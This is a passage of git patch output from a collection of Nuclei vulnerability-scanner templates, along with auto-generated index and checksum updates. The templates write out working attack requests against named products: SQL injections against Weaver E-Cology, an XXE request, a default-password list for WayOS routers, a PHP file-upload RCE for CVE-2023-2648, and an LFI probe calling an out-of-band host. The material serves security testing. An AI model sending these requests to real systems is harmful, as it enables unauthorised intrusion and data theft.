/smartbi/vision/RMIServlet?windowUnloading=%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%56%2f%75%75%75%37%75%4e%66%37%4e%66%4e%31%2f%75%37%31%27%2f%4e%4f%4a%4d%2f%4e%4f%4a%4e%2f%75%75%2f%4a%54 HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - className=UserService&methodName=isLogged¶ms=[] - matchers: - - type: word - words: - - 'H~CxOm~' - part: body \ No newline at end of file diff --git a/http/vulnerabilities/wayos-ac/wayos-ac-weak-login.yaml b/http/vulnerabilities/wayos-ac/wayos-ac-weak-login.yaml deleted file mode 100755 index cc49314398..0000000000 --- a/http/vulnerabilities/wayos-ac/wayos-ac-weak-login.yaml +++ /dev/null @@ -1,47 +0,0 @@ -id: wayos-ac-weak-login - -info: - name: wayos-ac weak password - author: SleepingBag945 - severity: high - description: wayos weak login credentials were discovered. - reference: - - https://github.com/Ershu1/2021_Hvv/blob/main/ - tags: ways-ac - -http: - - raw: - - | - POST /login.cgi HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - user=admin&password={{ password }}&Submit=%E7%99%BB%E5%BD%95 - - attack: pitchfork - payloads: - password: - - admin - - 123456 - - 12345678 - - password - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: header - words: - - "ac_userid=admin,ac_passwd" - condition: and - - - type: word - part: body - words: - - "window.open" - - "text/javascript" - condition: and - - - type: status - status: - - 200 \ No newline at end of file diff --git a/http/vulnerabilities/weaver/CNVD-2023-12632.yaml b/http/vulnerabilities/weaver/CNVD-2023-12632.yaml deleted file mode 100755 index f73fff1168..0000000000 --- a/http/vulnerabilities/weaver/CNVD-2023-12632.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CNVD-2023-12632 - -info: - name: E-Cology V9 - SQL Injection - author: daffainfo - severity: high - description: | - Ecology9 is a new and efficient collaborative office system created by Panmicro for medium and large organizations. There is a SQL injection vulnerability in Panmicro ecology9, which can be exploited by attackers to obtain sensitive database information. - reference: - - https://www.zhihu.com/tardis/zm/art/625931869?source_id=1003 - - https://blog.csdn.net/qq_50854662/article/details/129992329 - metadata: - max-request: 1 - verified: "true" - fofa-query: app="泛微-协同商务系统" - shodan-query: 'ecology_JSessionid' - tags: cnvd,cnvd2023,ecology,sqli - -# a' union select 1,''+(SELECT md5(9999999))+' -# URL encoded 3 times - -http: - - raw: - - | - GET /mobile/%20/plugin/browser.jsp?isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%38%25%32%35%25%33%37%25%33%38%25%32%35%25%33%32%25%33%35%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%38%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%30%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%38%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%34%25%32%35%25%33%35%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%34%25%36%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%33%37%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%33%38%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%33%34%25%32%35%25%33%33%25%36%34%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%33%25%33%31 HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'browserUrl' - - '"autoCount"' - - '"autoGet"' - condition: and - - - type: status - status: - - 200 diff --git a/http/vulnerabilities/weaver/ecology-oa-byxml-xxe.yaml b/http/vulnerabilities/weaver/ecology-oa-byxml-xxe.yaml deleted file mode 100755 index 869ef2f3e3..0000000000 --- a/http/vulnerabilities/weaver/ecology-oa-byxml-xxe.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: ecology-oa-byxml-xxe - -info: - name: EcologyOA deleteUserRequestInfoByXml - XXE - author: unknown - severity: high - description: EcologyOA deleteUserRequestInfoByXml interface has XXE - tags: ecology-oa,xxe - -http: - - raw: - - | - POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/xml - Accept-Encoding: gzip - - - - matchers: - - type: word - words: - - 'WfData' - diff --git a/http/vulnerabilities/weaver/ecology-oa-filedownloadforoutdoc-sqli.yaml b/http/vulnerabilities/weaver/ecology-oa-filedownloadforoutdoc-sqli.yaml deleted file mode 100755 index ccb8db79ea..0000000000 --- a/http/vulnerabilities/weaver/ecology-oa-filedownloadforoutdoc-sqli.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: ecology-oa-filedownloadforoutdoc-sqli - -info: - name: EcologyOA filedownloadforoutdoc - SQL injection - author: unknown - severity: critical - description: EcologyOA filedownloadforoutdoc interface has SQL injection - tags: ecology-oa,sqli - -http: - - raw: - - | - POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Accept-Encoding: gzip, deflate - Accept-Language: zh-CN,zh;q=0.9 - Connection: close - - fileid=2+WAITFOR DELAY+'0:0:7'&isFromOutImg=1 - matchers: - - type: dsl - dsl: - - 'duration>=7' - diff --git a/http/vulnerabilities/weaver/ecology/ecology-oa-byxml-xxe.yaml b/http/vulnerabilities/weaver/ecology/ecology-oa-byxml-xxe.yaml new file mode 100755 index 0000000000..0d4ed67290 --- /dev/null +++ b/http/vulnerabilities/weaver/ecology/ecology-oa-byxml-xxe.yaml @@ -0,0 +1,43 @@ +id: ecology-oa-byxml-xxe + +info: + name: EcologyOA deleteUserRequestInfoByXml - XML External Entity Injection + author: SleepingBag945 + severity: high + description: | + EcologyOA deleteUserRequestInfoByXml interface has XXE + metadata: + max-request: 1 + verified: true + shodan-query: ecology_JSessionid + fofa-query: app="泛微-协同办公OA" + tags: ecology-oa,xxe + +http: + - raw: + - | + POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/xml + Accept-Encoding: gzip + + + + &send; + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'WfData' + + - type: word + part: header + words: + - 'application/xml' + + - type: word + part: interactsh_protocol + words: + - "dns" \ No newline at end of file From b8b9e7b92be2eda2aba164b0594a8690e1ec8b02 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 5 Sep 2023 18:02:23 +0530 Subject: [PATCH 0146/1090] Create CVE-2023-2648.yaml --- http/cves/2023/CVE-2023-2648.yaml | 64 +++++++++++++++++++++++++++++++ 1 file changed, 64 insertions(+) create mode 100644 http/cves/2023/CVE-2023-2648.yaml diff --git a/http/cves/2023/CVE-2023-2648.yaml b/http/cves/2023/CVE-2023-2648.yaml new file mode 100644 index 0000000000..9938fec451 --- /dev/null +++ b/http/cves/2023/CVE-2023-2648.yaml @@ -0,0 +1,64 @@ +id: CVE-2023-2648 + +info: + name: Weaver E-Office 9.5 - Remote Code Execution + author: ritikchaddha + severity: critical + description: | + A vulnerability was found in Weaver E-Office 9.5. It has been classified as critical. This affects an unknown part of the file /inc/jquery/uploadify/uploadify.php. The manipulation of the argument Filedata leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-228777 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. + reference: + - https://github.com/sunyixuan1228/cve/blob/main/weaver.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-2648 + classification: + cve-id: CVE-2023-2648 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cwe-id: CWE-434 + metadata: + max-request: 2 + verified: true + fofa-query: app="泛微-EOffice" + tags: cve,cve2023,weaver,eoffice,ecology,fileupload,rce + +variables: + file: '{{rand_base(5, "abc")}}' + +http: + - raw: + - | + POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + + ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt + Content-Disposition: form-data; name="Filedata"; filename="{{file}}.php." + Content-Type: image/jpeg + + + ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt + + - | + POST /attachment/{{name}}/{{file}}.php HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - "747711c62dffae7dbf726d8241bd07fe" + + - type: status + part: body_2 + status: + - 200 + + extractors: + - type: regex + name: name + part: body + group: 1 + regex: + - "([0-9]+)" + internal: true From 7534ad59ac5b0a85322338885765c030f892a1e9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 5 Sep 2023 19:00:09 +0530 Subject: [PATCH 0147/1090] Create CVE-2023-4634.yaml --- http/cves/2023/CVE-2023-4634.yaml | 37 +++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 http/cves/2023/CVE-2023-4634.yaml diff --git a/http/cves/2023/CVE-2023-4634.yaml b/http/cves/2023/CVE-2023-4634.yaml new file mode 100644 index 0000000000..3694a6c7e6 --- /dev/null +++ b/http/cves/2023/CVE-2023-4634.yaml @@ -0,0 +1,37 @@ +id: CVE-2023-4634 + +info: + name: Media Library Assistant < 3.09 - Remote Code Execution/Local File Inclusion + author: Pepitoh,ritikchaddha + severity: critical + description: | + A vulnerability in the Wordpress Media-Library-Assistant plugins in version < 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration. + remediation: Fixed in version 3.09 + reference: + - https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/ + - https://cve.report/CVE-2023-4634 + classification: + cve-id: CVE-2023-4634 + metadata: + max-request: 1 + verified: true + publicwww-query: "wp-content/plugins/media-library-assistant" + tags: cve,cve2023,wordpress,wp,wp-plugin,lfi,rce + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/media-library-assistant/readme.txt" + - "{{BaseURL}}/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://{{interactsh-url}}/patrowl.svg" + + matchers-condition: and + matchers: + - type: word + part: body_1 + words: + - "Media Library Assistant" + + - type: word + part: interactsh_protocol + words: + - "dns" From fc0dcf0ea7926c237c0668cc0b80d426f8f1dd7b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 5 Sep 2023 19:02:19 +0530 Subject: [PATCH 0148/1090] update metadata & ref --- http/cves/2023/CVE-2023-4634.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-4634.yaml b/http/cves/2023/CVE-2023-4634.yaml index 3694a6c7e6..c45ff1abfa 100644 --- a/http/cves/2023/CVE-2023-4634.yaml +++ b/http/cves/2023/CVE-2023-4634.yaml @@ -9,14 +9,15 @@ info: remediation: Fixed in version 3.09 reference: - https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/ + - https://fr.wordpress.org/plugins/media-library-assistant/advanced/ - https://cve.report/CVE-2023-4634 classification: cve-id: CVE-2023-4634 metadata: - max-request: 1 + max-request: 2 verified: true publicwww-query: "wp-content/plugins/media-library-assistant" - tags: cve,cve2023,wordpress,wp,wp-plugin,lfi,rce + tags: cve,cve2023,wordpress,wp,wp-plugin,lfi,rce,media-library-assistant http: - method: GET From 09275ac9978b63f53f7646cbb5a6cd831b468ceb Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 5 Sep 2023 19:03:32 +0530 Subject: [PATCH 0149/1090] lint fix --- http/cves/2023/CVE-2023-4634.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-4634.yaml b/http/cves/2023/CVE-2023-4634.yaml index c45ff1abfa..59eb930a09 100644 --- a/http/cves/2023/CVE-2023-4634.yaml +++ b/http/cves/2023/CVE-2023-4634.yaml @@ -5,7 +5,7 @@ info: author: Pepitoh,ritikchaddha severity: critical description: | - A vulnerability in the Wordpress Media-Library-Assistant plugins in version < 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration. + A vulnerability in the Wordpress Media-Library-Assistant plugins in version < 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration. remediation: Fixed in version 3.09 reference: - https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/ From af49e31dc90e3030a9d9684a5a41e942f3c52157 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 5 Sep 2023 13:34:34 +0000 Subject: [PATCH 0150/1090] Auto Generated New Template Addition List [Tue Sep 5 13:34:34 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d8f4965489..09d794a869 100644 --- a/.new-additions +++ b/.new-additions @@ -8,6 +8,7 @@ http/cves/2021/CVE-2021-46107.yaml http/cves/2022/CVE-2022-22897.yaml http/cves/2023/CVE-2023-20073.yaml http/cves/2023/CVE-2023-26469.yaml +http/cves/2023/CVE-2023-2648.yaml http/cves/2023/CVE-2023-27034.yaml http/cves/2023/CVE-2023-30150.yaml http/cves/2023/CVE-2023-32563.yaml From 45cfc7468bf0c4c396d5bbfc829eed3348e81bee Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 5 Sep 2023 13:34:34 +0000 Subject: [PATCH 0151/1090] Auto Generated cves.json [Tue Sep 5 13:34:34 UTC 2023] :robot: --- cves.json | 3 ++- cves.json-checksum.txt | 2 +- 2 files changed, 3 insertions(+), 2 deletions(-) diff --git a/cves.json b/cves.json index 9fb28552ce..e4edfbc1ba 100644 --- a/cves.json +++ b/cves.json @@ -1453,7 +1453,7 @@ {"ID":"CVE-2022-0482","Info":{"Name":"Easy!Appointments \u003c1.4.3 - Broken Access Control","Severity":"critical","Description":"Easy!Appointments prior to 1.4.3 allows exposure of Private Personal Information to an unauthorized actor via the GitHub repository alextselegidis/easyappointments.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2022/CVE-2022-0482.yaml"} {"ID":"CVE-2022-0535","Info":{"Name":"WordPress E2Pdf \u003c1.16.45 - Cross-Site Scripting","Severity":"medium","Description":"WordPress E2Pdf plugin before 1.16.45 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape some of its settings, even when the unfiltered_html capability is disallowed. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, making it possible to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2022/CVE-2022-0535.yaml"} {"ID":"CVE-2022-0540","Info":{"Name":"Atlassian Jira Seraph - Authentication Bypass","Severity":"critical","Description":"Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0540.yaml"} -{"ID":"CVE-2022-0591","Info":{"Name":"Formcraft3 \u003c3.8.28 - Server-Side Request Forgery","Severity":"critical","Description":"Formcraft3 before version 3.8.2 does not validate the URL parameter in the formcraft3_get AJAX action, leading to server-side request forgery issues exploitable by unauthenticated users.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2022/CVE-2022-0591.yaml"} +{"ID":"CVE-2022-0591","Info":{"Name":"Formcraft3 \u003c3.8.28 - Server-Side Request Forgery","Severity":"critical","Description":"Formcraft3 before version 3.8.2 does not validate the URL parameter in the formcraft3_get AJAX action, leading to server-side request forgery issues exploitable by unauthenticated users.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2022/CVE-2022-0591.yaml"} {"ID":"CVE-2022-0594","Info":{"Name":"WordPress Shareaholic \u003c9.7.6 - Information Disclosure","Severity":"medium","Description":"WordPress Shareaholic plugin prior to 9.7.6 is susceptible to information disclosure. The plugin does not have proper authorization check in one of the AJAX actions, available to both unauthenticated (before 9.7.5) and authenticated (in 9.7.5) users, allowing them to possibly obtain sensitive information such as active plugins and different versions (PHP, cURL, WP, etc.).","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-0594.yaml"} {"ID":"CVE-2022-0595","Info":{"Name":"WordPress Contact Form 7 \u003c1.3.6.3 - Stored Cross-Site Scripting","Severity":"medium","Description":"WordPress Contact Form 7 before 1.3.6.3 contains an unauthenticated stored cross-site scripting vulnerability in the Drag and Drop Multiple File Upload plugin. SVG files can be uploaded by default via the dnd_codedropz_upload AJAX action.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-0595.yaml"} {"ID":"CVE-2022-0599","Info":{"Name":"WordPress Mapping Multiple URLs Redirect Same Page \u003c=5.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Mapping Multiple URLs Redirect Same Page plugin 5.8 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the mmursp_id parameter before outputting it back in an admin page.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0599.yaml"} @@ -1922,6 +1922,7 @@ {"ID":"CVE-2023-26256","Info":{"Name":"STAGIL Navigation for Jira Menu \u0026 Themes \u003c2.0.52 - Local File Inclusion","Severity":"high","Description":"STAGIL Navigation for Jira Menu \u0026 Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjFooterNavigationConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-26256.yaml"} {"ID":"CVE-2023-26360","Info":{"Name":"Unauthenticated File Read Adobe ColdFusion","Severity":"high","Description":"Unauthenticated Arbitrary File Read vulnerability due to deserialization of untrusted data in Adobe ColdFusion. The vulnerability affects ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2023/CVE-2023-26360.yaml"} {"ID":"CVE-2023-26469","Info":{"Name":"Jorani 1.0.0 - Remote Code Execution","Severity":"critical","Description":"Jorani 1.0.0, an attacker could leverage path traversal to access files and execute code on the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-26469.yaml"} +{"ID":"CVE-2023-2648","Info":{"Name":"Weaver E-Office 9.5 - Remote Code Execution","Severity":"critical","Description":"A vulnerability was found in Weaver E-Office 9.5. It has been classified as critical. This affects an unknown part of the file /inc/jquery/uploadify/uploadify.php. The manipulation of the argument Filedata leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-228777 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2648.yaml"} {"ID":"CVE-2023-26842","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the OptionManager.php.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-26842.yaml"} {"ID":"CVE-2023-26843","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the NoteEditor.php.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-26843.yaml"} {"ID":"CVE-2023-27008","Info":{"Name":"ATutor \u003c 2.2.1 - Cross Site Scripting","Severity":"medium","Description":"ATutor \u003c 2.2.1 was discovered with a vulnerability, a reflected cross-site scripting (XSS), in ATtutor 2.2.1 via token body parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-27008.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index e3e9b611d8..d9e1d54443 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -a9e7ce585ba796a3d01ee394a6809fad +e5b11b760f44d352dcb8bc61ac5651ed From ed64df1e0e425a106260e39818555d662387eff2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 5 Sep 2023 13:34:47 +0000 Subject: [PATCH 0152/1090] Auto Generated Templates Checksum [Tue Sep 5 13:34:47 UTC 2023] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index dd5752e02a..ed6fc466f7 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2544,6 +2544,7 @@ http/cves/2023/CVE-2023-26255.yaml:588fcf4f4f657f8366804766c3a773c78805d554 http/cves/2023/CVE-2023-26256.yaml:338e81a17c155dd2555f1bcd388fa362d7a84f83 http/cves/2023/CVE-2023-26360.yaml:804ddd2b844c25ee0cb31360deb4e845e1d063d0 http/cves/2023/CVE-2023-26469.yaml:8a6db224c82c2cc2333dcfaf7d5cfe6ed3423aae +http/cves/2023/CVE-2023-2648.yaml:437bf1322a691e5c0eb8bc0292ab487fd0de34c5 http/cves/2023/CVE-2023-26842.yaml:9d6d6f25eca58c0e1214fa3ac6eeb3917fc9ee0b http/cves/2023/CVE-2023-26843.yaml:3f2aa43def8b8b49bf6bfe2912482543c1eba1fe http/cves/2023/CVE-2023-27008.yaml:2bb53213d54d4fbc6a2b47fd9220837a87786139 @@ -7040,7 +7041,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:1788dcada2550f9eeafe931a91a63256e50b2e6d +templates-checksum.txt:38602f587cd9d12cccbd204741df03185a807719 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From bc76ef7e7da1bdb466d95a8e8bb10e481c0dc6b3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 5 Sep 2023 13:36:43 +0000 Subject: [PATCH 0153/1090] Auto Generated New Template Addition List [Tue Sep 5 13:36:43 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 09d794a869..5cd51e27f1 100644 --- a/.new-additions +++ b/.new-additions @@ -15,6 +15,7 @@ http/cves/2023/CVE-2023-32563.yaml http/cves/2023/CVE-2023-34124.yaml http/cves/2023/CVE-2023-34192.yaml http/cves/2023/CVE-2023-36844.yaml +http/cves/2023/CVE-2023-4634.yaml http/exposed-panels/aspcms-backend-panel.yaml http/exposed-panels/greenbone-panel.yaml http/exposed-panels/jorani-panel.yaml From c6ed1f0c327226e7f99c1ae29719f589f52495c7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 5 Sep 2023 13:36:54 +0000 Subject: [PATCH 0154/1090] Auto Generated Templates Checksum [Tue Sep 5 13:36:54 UTC 2023] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ed6fc466f7..8e67b3feab 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8,8 +8,8 @@ TEMPLATES-STATS.json:c4cc92fde64428a2e1e877b68f77a574c44e3b78 TEMPLATES-STATS.md:67c1555dd476c5b59ee278a560384ea46af7ee57 TOP-10.md:fa6189d7c66fbd05133727e032d48a030274079b contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9 -cves.json:97ee9433bf7132d31d6e7d54b161a16015ad9dad -cves.json-checksum.txt:bbd214fdb91bc2f11273a84ead4f2b86653b2c7b +cves.json:c051d75a5aae09c4b5cd28c6ce25ecd373091fc5 +cves.json-checksum.txt:88f8a79ef2a514044c505894ed017ea539936074 dns/azure-takeover-detection.yaml:bcfb33e8a76b75042967f0301e57dc98d5f2da7c dns/caa-fingerprint.yaml:7dcc71c91d6cb3d8e290e09b52768b6017fbb161 dns/detect-dangling-cname.yaml:bba3b5b57357e86830d9f76e28b988107597b75c @@ -2634,6 +2634,7 @@ http/cves/2023/CVE-2023-39143.yaml:57dbbf664e21aed709d1d1001b3c2f81d42ee9a4 http/cves/2023/CVE-2023-3936.yaml:718e00aebfd9ba084426938d53da33c2b084fc42 http/cves/2023/CVE-2023-4173.yaml:add4098ac7435ecc0fc9c55e00232d441b522a1f http/cves/2023/CVE-2023-4174.yaml:1902cb27adf5853b7f3cd5312963e6dddfb2a298 +http/cves/2023/CVE-2023-4634.yaml:52424e8bdbd08b6d9cea82d086b21ca1b9e109ee http/default-logins/3com/3com-nj2000-default-login.yaml:c00b706cfbbb60a4377ed00240d60f1b4679f18d http/default-logins/UCMDB/ucmdb-default-login.yaml:65a8ff54c063a35e251409ed8bfd1a93e50d42c2 http/default-logins/abb/cs141-default-login.yaml:8914cccfee6dfcbfbb632cf088ca7a33823561d6 @@ -7041,7 +7042,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:38602f587cd9d12cccbd204741df03185a807719 +templates-checksum.txt:a7d918cc23acd383a3e47f73fd8783ef234d7ca7 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From a686751d47c029161af57ef7754ccb04ebefb373 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 5 Sep 2023 13:38:06 +0000 Subject: [PATCH 0155/1090] Auto Generated cves.json [Tue Sep 5 13:38:06 UTC 2023] :robot: 